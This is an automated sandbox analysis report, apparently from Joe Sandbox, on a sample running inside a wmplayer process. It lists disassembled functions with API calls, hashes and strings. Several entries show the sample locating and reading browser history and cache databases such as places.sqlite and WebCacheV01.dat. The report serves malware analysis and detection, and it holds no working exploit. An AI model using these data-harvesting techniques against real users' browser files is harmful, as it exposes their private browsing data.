                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 669240632-0
                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                            Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                            • String ID: "%s"
                                                                                            • API String ID: 1343145685-3297466227
                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                            Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                            • API String ID: 1714573020-3385500049
                                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                            Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                            • memset.MSVCRT ref: 00408828
                                                                                            • memset.MSVCRT ref: 00408840
                                                                                            • memset.MSVCRT ref: 00408858
                                                                                            • memset.MSVCRT ref: 00408870
                                                                                            • memset.MSVCRT ref: 00408888
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2911713577-0
                                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                            Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp
                                                                                            • String ID: @ $SQLite format 3
                                                                                            • API String ID: 1475443563-3708268960
                                                                                            • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                            • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                            Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 2705122986-2036018995
                                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                            Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpqsort
                                                                                            • String ID: /nosort$/sort
                                                                                            • API String ID: 1579243037-1578091866
                                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                            Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                            • API String ID: 3354267031-2114579845
                                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                            Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                            Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                            Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                            • API String ID: 2221118986-1725073988
                                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                            Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@DeleteObject
                                                                                            • String ID: r!A
                                                                                            • API String ID: 1103273653-628097481
                                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                            Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                            Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$memcmp
                                                                                            • String ID: $$8
                                                                                            • API String ID: 2808797137-435121686
                                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                            Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • duplicate column name: %s, xrefs: 004307FE
                                                                                            • too many columns on %s, xrefs: 00430763
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: duplicate column name: %s$too many columns on %s
                                                                                            • API String ID: 0-1445880494
                                                                                            • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                            • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                            • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                            • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                            Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                            • String ID:
                                                                                            • API String ID: 1979745280-0
                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                            Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                            • memset.MSVCRT ref: 00403A55
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                            • String ID: history.dat$places.sqlite
                                                                                            • API String ID: 2641622041-467022611
                                                                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                            Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 839530781-0
                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                            Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID: *.*$index.dat
                                                                                            • API String ID: 1974802433-2863569691
                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
